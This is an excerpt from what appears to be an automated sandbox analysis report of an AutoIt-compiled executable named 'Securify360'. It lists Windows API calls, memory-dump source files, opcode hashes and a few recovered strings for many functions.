                                                                                              • Opcode Fuzzy Hash: 7904cb7cec07010be963ea519bea8f576ada4696cad34071069a0d3468a3a076
                                                                                              • Instruction Fuzzy Hash: BC219A70204708AFEB715F61EC88B363B6AEB48B58F285019F781C116DCA7A8D00EB61
                                                                                              APIs
                                                                                                • Part of subcall function 00F94D37: __itow.LIBCMT ref: 00F94D62
                                                                                                • Part of subcall function 00F94D37: __swprintf.LIBCMT ref: 00F94DAC
                                                                                              • CoInitialize.OLE32(00000000), ref: 00FFDC2D
                                                                                              • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 00FFDCC0
                                                                                              • SHGetDesktopFolder.SHELL32(?), ref: 00FFDCD4
                                                                                              • CoCreateInstance.OLE32(01023D4C,00000000,00000001,0104B86C,?), ref: 00FFDD20
                                                                                              • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 00FFDD8F
                                                                                              • CoTaskMemFree.OLE32(?,?), ref: 00FFDDE7
                                                                                              • _memset.LIBCMT ref: 00FFDE24
                                                                                              • SHBrowseForFolderW.SHELL32(?), ref: 00FFDE60
                                                                                              • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00FFDE83
                                                                                              • CoTaskMemFree.OLE32(00000000), ref: 00FFDE8A
                                                                                              • CoTaskMemFree.OLE32(00000000,00000001,00000000), ref: 00FFDEC1
                                                                                              • CoUninitialize.OLE32(00000001,00000000), ref: 00FFDEC3
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000013.00000002.1451206484.0000000000F91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00F90000, based on PE: true
                                                                                              • Associated: 00000013.00000002.1451188533.0000000000F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001020000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001046000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451321302.0000000001050000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451347155.0000000001059000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_19_2_f90000_Securify360.jbxd
                                                                                              Similarity
                                                                                              • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize__itow__swprintf_memset
                                                                                              • String ID:
                                                                                              • API String ID: 1246142700-0
                                                                                              • Opcode ID: 5229a9dabe338f55343a7448f97bd6fe6536fec5153f94cd78ea4f0bfaee459f
                                                                                              • Instruction ID: 5fd6780c11875f579e5adcfc443fdc4d70977dbc2d4f7fcb560c81710216cb51
                                                                                              • Opcode Fuzzy Hash: 5229a9dabe338f55343a7448f97bd6fe6536fec5153f94cd78ea4f0bfaee459f
                                                                                              • Instruction Fuzzy Hash: 58B1F975A00209AFDB14DFA4C888DAEBBB9FF48314B108459F909EB361DB35EE41DB50
                                                                                              APIs
                                                                                              • GetKeyboardState.USER32(?), ref: 00FF0896
                                                                                              • SetKeyboardState.USER32(?), ref: 00FF0901
                                                                                              • GetAsyncKeyState.USER32(000000A0), ref: 00FF0921
                                                                                              • GetKeyState.USER32(000000A0), ref: 00FF0938
                                                                                              • GetAsyncKeyState.USER32(000000A1), ref: 00FF0967
                                                                                              • GetKeyState.USER32(000000A1), ref: 00FF0978
                                                                                              • GetAsyncKeyState.USER32(00000011), ref: 00FF09A4
                                                                                              • GetKeyState.USER32(00000011), ref: 00FF09B2
                                                                                              • GetAsyncKeyState.USER32(00000012), ref: 00FF09DB
                                                                                              • GetKeyState.USER32(00000012), ref: 00FF09E9
                                                                                              • GetAsyncKeyState.USER32(0000005B), ref: 00FF0A12
                                                                                              • GetKeyState.USER32(0000005B), ref: 00FF0A20
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000013.00000002.1451206484.0000000000F91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00F90000, based on PE: true
                                                                                              • Associated: 00000013.00000002.1451188533.0000000000F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001020000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001046000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451321302.0000000001050000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451347155.0000000001059000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_19_2_f90000_Securify360.jbxd
                                                                                              Similarity
                                                                                              • API ID: State$Async$Keyboard
                                                                                              • String ID:
                                                                                              • API String ID: 541375521-0
                                                                                              • Opcode ID: ba2d5df48995b53f07631025e7963df698f81bda3e657ef2ab469e000b24872e
                                                                                              • Instruction ID: e80375660f0cc57fbbcb4997531399d1179553f7da5deee961d55847f0b6e525
                                                                                              • Opcode Fuzzy Hash: ba2d5df48995b53f07631025e7963df698f81bda3e657ef2ab469e000b24872e
                                                                                              • Instruction Fuzzy Hash: 6851C930D0478C69FB35DBA088147BABFB49F013A0F084599D6C2575D3EEA89A4CD795
                                                                                              APIs
                                                                                              • GetDlgItem.USER32(?,00000001), ref: 00FECE1C
                                                                                              • GetWindowRect.USER32(00000000,?), ref: 00FECE2E
                                                                                              • MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 00FECE8C
                                                                                              • GetDlgItem.USER32(?,00000002), ref: 00FECE97
                                                                                              • GetWindowRect.USER32(00000000,?), ref: 00FECEA9
                                                                                              • MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 00FECEFD
                                                                                              • GetDlgItem.USER32(?,000003E9), ref: 00FECF0B
                                                                                              • GetWindowRect.USER32(00000000,?), ref: 00FECF1C
                                                                                              • MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 00FECF5F
                                                                                              • GetDlgItem.USER32(?,000003EA), ref: 00FECF6D
                                                                                              • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 00FECF8A
                                                                                              • InvalidateRect.USER32(?,00000000,00000001), ref: 00FECF97
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000013.00000002.1451206484.0000000000F91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00F90000, based on PE: true
                                                                                              • Associated: 00000013.00000002.1451188533.0000000000F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001020000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001046000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451321302.0000000001050000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451347155.0000000001059000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_19_2_f90000_Securify360.jbxd
                                                                                              Similarity
                                                                                              • API ID: Window$ItemMoveRect$Invalidate
                                                                                              • String ID:
                                                                                              • API String ID: 3096461208-0
                                                                                              • Opcode ID: e6245e5b5986abf3932ab56099900ca93b9e752ac0208136d76df4c036560071
                                                                                              • Instruction ID: 02f2eb3f8333637ce52fce36240f0668fd66a88f2ccbbfed9c5bf64bc0c504c7
                                                                                              • Opcode Fuzzy Hash: e6245e5b5986abf3932ab56099900ca93b9e752ac0208136d76df4c036560071
                                                                                              • Instruction Fuzzy Hash: 0C513071F00305AFDB28CF69CD99AAEBBB6FB88710F248129F515D7294D7719D018B50
                                                                                              APIs
                                                                                                • Part of subcall function 00F91F1D: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00F92412,?,00000000,?,?,?,?,00F91AA7,00000000,?), ref: 00F91F76
                                                                                              • DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 00F924AF
                                                                                              • KillTimer.USER32(-00000001,?,?,?,?,00F91AA7,00000000,?,?,00F91EBE,?,?), ref: 00F9254A
                                                                                              • DestroyAcceleratorTable.USER32(00000000), ref: 00FCBFE7
                                                                                              • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00F91AA7,00000000,?,?,00F91EBE,?,?), ref: 00FCC018
                                                                                              • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00F91AA7,00000000,?,?,00F91EBE,?,?), ref: 00FCC02F
                                                                                              • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00F91AA7,00000000,?,?,00F91EBE,?,?), ref: 00FCC04B
                                                                                              • DeleteObject.GDI32(00000000), ref: 00FCC05D
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000013.00000002.1451206484.0000000000F91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00F90000, based on PE: true
                                                                                              • Associated: 00000013.00000002.1451188533.0000000000F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001020000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001046000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451321302.0000000001050000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451347155.0000000001059000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_19_2_f90000_Securify360.jbxd
                                                                                              Similarity
                                                                                              • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                                                                              • String ID:
                                                                                              • API String ID: 641708696-0
                                                                                              • Opcode ID: 92bb34014e9ebcf9eef1186d6262fcf2c65e01a73afd4e9e4b9c6c83874806dd
                                                                                              • Instruction ID: b34abf4403658e68d71a93c4c338d15855326551470f4c41cfa96f04da889f0b
                                                                                              • Opcode Fuzzy Hash: 92bb34014e9ebcf9eef1186d6262fcf2c65e01a73afd4e9e4b9c6c83874806dd
                                                                                              • Instruction Fuzzy Hash: DA61AE31941701EFEB75DF18D949B3A77B1FB40322F94852DE48686A58C37AA881FF90
                                                                                              APIs
                                                                                                • Part of subcall function 00F929AB: GetWindowLongW.USER32(?,000000EB), ref: 00F929BC
                                                                                              • GetSysColor.USER32(0000000F), ref: 00F925AF
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000013.00000002.1451206484.0000000000F91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00F90000, based on PE: true
                                                                                              • Associated: 00000013.00000002.1451188533.0000000000F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001020000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001046000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451321302.0000000001050000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451347155.0000000001059000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_19_2_f90000_Securify360.jbxd
                                                                                              Similarity
                                                                                              • API ID: ColorLongWindow
                                                                                              • String ID:
                                                                                              • API String ID: 259745315-0
                                                                                              • Opcode ID: d5b532139496eeea554c1fcafd5a9fafb73bd334d3552c2afb7dd7cbb4187d45
                                                                                              • Instruction ID: 5e665aa5e267d9592ad47c768d6db3b384f8c2e87e6af599e41f76f6c50e5c9b
                                                                                              • Opcode Fuzzy Hash: d5b532139496eeea554c1fcafd5a9fafb73bd334d3552c2afb7dd7cbb4187d45
                                                                                              • Instruction Fuzzy Hash: C841B231400244BFEF715F289888BB93B66FB0A331F294265FDA58A1DAD7358C41FB61
                                                                                              APIs
                                                                                                • Part of subcall function 00FB0B8B: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,00FA2A3E,?,00008000), ref: 00FB0BA7
                                                                                                • Part of subcall function 00FB0284: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00FA2A58,?,00008000), ref: 00FB02A4
                                                                                              • SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00FA2ADF
                                                                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 00FA2C2C
                                                                                                • Part of subcall function 00FA3EBE: _wcscpy.LIBCMT ref: 00FA3EF6
                                                                                                • Part of subcall function 00FB386D: _iswctype.LIBCMT ref: 00FB3875
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000013.00000002.1451206484.0000000000F91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00F90000, based on PE: true
                                                                                              • Associated: 00000013.00000002.1451188533.0000000000F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001020000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001046000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451321302.0000000001050000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451347155.0000000001059000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_19_2_f90000_Securify360.jbxd
                                                                                              Similarity
                                                                                              • API ID: CurrentDirectory$FullNamePath_iswctype_wcscpy
                                                                                              • String ID: #include depth exceeded. Make sure there are no recursive includes$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
                                                                                              • API String ID: 537147316-3738523708
                                                                                              • Opcode ID: 7f9e8a371b5ea241757b7cfbc745109c506d6ca76dbc0831c609f3d7edb47b0b
                                                                                              • Instruction ID: 78c70c957f36335c4d73ff0f895be4c78be234d5992fc9d931963008a622b258
                                                                                              • Opcode Fuzzy Hash: 7f9e8a371b5ea241757b7cfbc745109c506d6ca76dbc0831c609f3d7edb47b0b
                                                                                              • Instruction Fuzzy Hash: 0C02C3715083419FC724EF24C881EAFBBE5BF86364F04491EF496972A1DB34D949EB42
                                                                                              APIs
                                                                                              • CharLowerBuffW.USER32(?,?,01020980), ref: 00FFAF4E
                                                                                              • GetDriveTypeW.KERNEL32(00000061,0104B5F0,00000061), ref: 00FFB018
                                                                                              • _wcscpy.LIBCMT ref: 00FFB042
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000013.00000002.1451206484.0000000000F91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00F90000, based on PE: true
                                                                                              • Associated: 00000013.00000002.1451188533.0000000000F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001020000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001046000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451321302.0000000001050000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451347155.0000000001059000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_19_2_f90000_Securify360.jbxd
                                                                                              Similarity
                                                                                              • API ID: BuffCharDriveLowerType_wcscpy
                                                                                              • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                                                                                              • API String ID: 2820617543-1000479233
                                                                                              • Opcode ID: 798f0ea90164fe8bad9ca2795b0ee1b6a047a877178d86cd773581a077214515
                                                                                              • Instruction ID: 429d830acfdc2b9773927b56779cac8855ce96ee5e5a6c3422f5d2b5f01cf5bf
                                                                                              • Opcode Fuzzy Hash: 798f0ea90164fe8bad9ca2795b0ee1b6a047a877178d86cd773581a077214515
                                                                                              • Instruction Fuzzy Hash: 3451BEB15083099BC710EF24CC91AABB7A5FF94314F10481DF6955B2E2EF35ED09EA92
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000013.00000002.1451206484.0000000000F91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00F90000, based on PE: true
                                                                                              • Associated: 00000013.00000002.1451188533.0000000000F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001020000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001046000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451321302.0000000001050000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451347155.0000000001059000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_19_2_f90000_Securify360.jbxd
                                                                                              Similarity
                                                                                              • API ID: __i64tow__itow__swprintf
                                                                                              • String ID: %.15g$0x%p$False$True
                                                                                              • API String ID: 421087845-2263619337
                                                                                              • Opcode ID: 93c770023fc98ed6dec7291ef00b108d6b20734db412c1dbd9de95a22bc0b75a
                                                                                              • Instruction ID: 58d2bcdc6bf752bea1a3e0bb596a8744bf41c8a5f471b9edcbff2d8394726e49
                                                                                              • Opcode Fuzzy Hash: 93c770023fc98ed6dec7291ef00b108d6b20734db412c1dbd9de95a22bc0b75a
                                                                                              • Instruction Fuzzy Hash: 1C41E976E04209AFEB34DF74DD42F7A73E8EB45310F20446EE149D7292EA35E902AB10
                                                                                              APIs
                                                                                              • _memset.LIBCMT ref: 0101778F
                                                                                              • CreateMenu.USER32 ref: 010177AA
                                                                                              • SetMenu.USER32(?,00000000), ref: 010177B9
                                                                                              • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 01017846
                                                                                              • IsMenu.USER32(?), ref: 0101785C
                                                                                              • CreatePopupMenu.USER32 ref: 01017866
                                                                                              • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 01017893
                                                                                              • DrawMenuBar.USER32 ref: 0101789B
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000013.00000002.1451206484.0000000000F91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00F90000, based on PE: true
                                                                                              • Associated: 00000013.00000002.1451188533.0000000000F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001020000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001046000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451321302.0000000001050000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451347155.0000000001059000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_19_2_f90000_Securify360.jbxd
                                                                                              Similarity
                                                                                              • API ID: Menu$CreateItem$DrawInfoInsertPopup_memset
                                                                                              • String ID: 0$F
                                                                                              • API String ID: 176399719-3044882817
                                                                                              • Opcode ID: dec918598bf11735ab21d5c17bf5c898df4f68dc89b306f8c489dff6e8e9939a
                                                                                              • Instruction ID: 18ef9505a45ab20f22f8af7c95e3654d7463b3ab7d96fc45168489bac03c0456
                                                                                              • Opcode Fuzzy Hash: dec918598bf11735ab21d5c17bf5c898df4f68dc89b306f8c489dff6e8e9939a
                                                                                              • Instruction Fuzzy Hash: E3412874A00209EFEB20DF68D884AAABBF5FF49310F144469FD85A7359D739A910DF50
                                                                                              APIs
                                                                                              • MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 01017B83
                                                                                              • CreateCompatibleDC.GDI32(00000000), ref: 01017B8A
                                                                                              • SendMessageW.USER32(?,00000173,00000000,00000000), ref: 01017B9D
                                                                                              • SelectObject.GDI32(00000000,00000000), ref: 01017BA5
                                                                                              • GetPixel.GDI32(00000000,00000000,00000000), ref: 01017BB0
                                                                                              • DeleteDC.GDI32(00000000), ref: 01017BB9
                                                                                              • GetWindowLongW.USER32(?,000000EC), ref: 01017BC3
                                                                                              • SetLayeredWindowAttributes.USER32(?,00000000,00000000,00000001), ref: 01017BD7
                                                                                              • DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?,?), ref: 01017BE3
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000013.00000002.1451206484.0000000000F91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00F90000, based on PE: true
                                                                                              • Associated: 00000013.00000002.1451188533.0000000000F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001020000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001046000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451321302.0000000001050000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451347155.0000000001059000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_19_2_f90000_Securify360.jbxd
                                                                                              Similarity
                                                                                              • API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
                                                                                              • String ID: static
                                                                                              • API String ID: 2559357485-2160076837
                                                                                              • Opcode ID: 7cf85650a001cc223fc823863d85172eb3b156fd6aa6dfc0761259c19e268d50
                                                                                              • Instruction ID: e90dcf5ab06b24698128b16c854d01b1ebcd34c17a4054f5113ad75c51e5af4f
                                                                                              • Opcode Fuzzy Hash: 7cf85650a001cc223fc823863d85172eb3b156fd6aa6dfc0761259c19e268d50
                                                                                              • Instruction Fuzzy Hash: 87316F32100219ABEF329F64DC88FDB3B69FF09720F200215FA9596198C73AD850DBA4
                                                                                              APIs
                                                                                              • _memset.LIBCMT ref: 00FB706B
                                                                                                • Part of subcall function 00FB8D58: __getptd_noexit.LIBCMT ref: 00FB8D58
                                                                                              • __gmtime64_s.LIBCMT ref: 00FB7104
                                                                                              • __gmtime64_s.LIBCMT ref: 00FB713A
                                                                                              • __gmtime64_s.LIBCMT ref: 00FB7157
                                                                                              • __allrem.LIBCMT ref: 00FB71AD
                                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00FB71C9
                                                                                              • __allrem.LIBCMT ref: 00FB71E0
                                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00FB71FE
                                                                                              • __allrem.LIBCMT ref: 00FB7215
                                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00FB7233
                                                                                              • __invoke_watson.LIBCMT ref: 00FB72A4
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000013.00000002.1451206484.0000000000F91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00F90000, based on PE: true
                                                                                              • Associated: 00000013.00000002.1451188533.0000000000F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001020000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001046000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451321302.0000000001050000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451347155.0000000001059000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_19_2_f90000_Securify360.jbxd
                                                                                              Similarity
                                                                                              • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
                                                                                              • String ID:
                                                                                              • API String ID: 384356119-0
                                                                                              • Opcode ID: f1a8c047e8f29504aad4589f782c76ed1b73a3870b2d4d8a344ebdfc9c3668e8
                                                                                              • Instruction ID: 78db3d2cc836221fc9cc2700ac64a420f9695ea09473328d51f5618c4b5d863b
                                                                                              • Opcode Fuzzy Hash: f1a8c047e8f29504aad4589f782c76ed1b73a3870b2d4d8a344ebdfc9c3668e8
                                                                                              • Instruction Fuzzy Hash: 3C71E871E04717ABD714BE7ACC82BDAB3B8AF90360F14422AF514E7281E774D940AF90
                                                                                              APIs
                                                                                              • _memset.LIBCMT ref: 00FF2CE9
                                                                                              • GetMenuItemInfoW.USER32(01057890,000000FF,00000000,00000030), ref: 00FF2D4A
                                                                                              • SetMenuItemInfoW.USER32(01057890,00000004,00000000,00000030), ref: 00FF2D80
                                                                                              • Sleep.KERNEL32(000001F4), ref: 00FF2D92
                                                                                              • GetMenuItemCount.USER32(?), ref: 00FF2DD6
                                                                                              • GetMenuItemID.USER32(?,00000000), ref: 00FF2DF2
                                                                                              • GetMenuItemID.USER32(?,-00000001), ref: 00FF2E1C
                                                                                              • GetMenuItemID.USER32(?,?), ref: 00FF2E61
                                                                                              • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00FF2EA7
                                                                                              • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00FF2EBB
                                                                                              • SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00FF2EDC
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000013.00000002.1451206484.0000000000F91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00F90000, based on PE: true
                                                                                              • Associated: 00000013.00000002.1451188533.0000000000F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001020000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001046000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451321302.0000000001050000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451347155.0000000001059000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_19_2_f90000_Securify360.jbxd
                                                                                              Similarity
                                                                                              • API ID: ItemMenu$Info$CheckCountRadioSleep_memset
                                                                                              • String ID:
                                                                                              • API String ID: 4176008265-0
                                                                                              • Opcode ID: adfa3fc0f37e594288a7bd6a061b31233f88e58b378a5b9952f736b8d7cb1c5b
                                                                                              • Instruction ID: 5d4572a2f89353391711087d430efcd59b31270615279de033347f4fc864816d
                                                                                              • Opcode Fuzzy Hash: adfa3fc0f37e594288a7bd6a061b31233f88e58b378a5b9952f736b8d7cb1c5b
                                                                                              • Instruction Fuzzy Hash: 2A619DB190034DAFDB61CF64C888ABFBBB8EF41314F240059FA41A7265D776AD05EB21
                                                                                              APIs
                                                                                              • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 010175CA
                                                                                              • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 010175CD
                                                                                              • GetWindowLongW.USER32(?,000000F0), ref: 010175F1
                                                                                              • _memset.LIBCMT ref: 01017602
                                                                                              • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 01017614
                                                                                              • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 0101768C
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000013.00000002.1451206484.0000000000F91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00F90000, based on PE: true
                                                                                              • Associated: 00000013.00000002.1451188533.0000000000F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001020000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001046000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451321302.0000000001050000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451347155.0000000001059000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_19_2_f90000_Securify360.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageSend$LongWindow_memset
                                                                                              • String ID:
                                                                                              • API String ID: 830647256-0
                                                                                              • Opcode ID: f041f0630858f15d0f43ea8bedaf3d4d840523266f70a5c0c0530a121624f4d6
                                                                                              • Instruction ID: 6198c8a0a61e04233a0592c88dbb343886b8dfcbfb84240b4bdc7e812fa3fbee
                                                                                              • Opcode Fuzzy Hash: f041f0630858f15d0f43ea8bedaf3d4d840523266f70a5c0c0530a121624f4d6
                                                                                              • Instruction Fuzzy Hash: A5616A75900208AFDB21DFA8CC81EEE77F8FB09710F100199FA95A7291D779AE45DB60
                                                                                              APIs
                                                                                              • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 00FE77DD
                                                                                              • SafeArrayAllocData.OLEAUT32(?), ref: 00FE7836
                                                                                              • VariantInit.OLEAUT32(?), ref: 00FE7848
                                                                                              • SafeArrayAccessData.OLEAUT32(?,?), ref: 00FE7868
                                                                                              • VariantCopy.OLEAUT32(?,?), ref: 00FE78BB
                                                                                              • SafeArrayUnaccessData.OLEAUT32(?), ref: 00FE78CF
